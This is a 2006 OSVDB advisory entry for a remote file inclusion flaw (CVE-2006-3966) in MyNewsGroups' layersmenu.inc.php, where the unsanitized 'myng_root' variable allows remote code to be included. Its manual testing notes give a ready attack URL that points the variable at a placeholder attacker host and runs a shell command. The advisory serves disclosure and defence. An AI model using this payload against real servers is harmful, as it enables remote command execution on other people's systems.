MyNewsGroups layersmenu.inc.php myng_root Variable Remote File Inclusion

2006-07-31T04:49:03
ID OSVDB:27666
Type osvdb
Reporter Philipp Niedziela(philipp.niedziela@gmx.de)
Modified 2006-07-31T04:49:03

Description

Vulnerability Description

MyNewsGroups contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /lib/tree/layersmenu.inc.php script not properly sanitizing user input supplied to the 'myng_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

MyNewsGroups contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /lib/tree/layersmenu.inc.php script not properly sanitizing user input supplied to the 'myng_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://[attacker]/PEAR.php/&cmd=ls

References:

Vendor URL: http://mynewsgroups.sourceforge.net/ Secunia Advisory ID:21263 Other Advisory URL: http://www.bb-pcsecurity.de/sicherheit_266.htm Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0563.html Generic Exploit URL: http://www.milw0rm.com/exploits/2096 FrSIRT Advisory: ADV-2006-3073 CVE-2006-3966 Bugtraq ID: 19258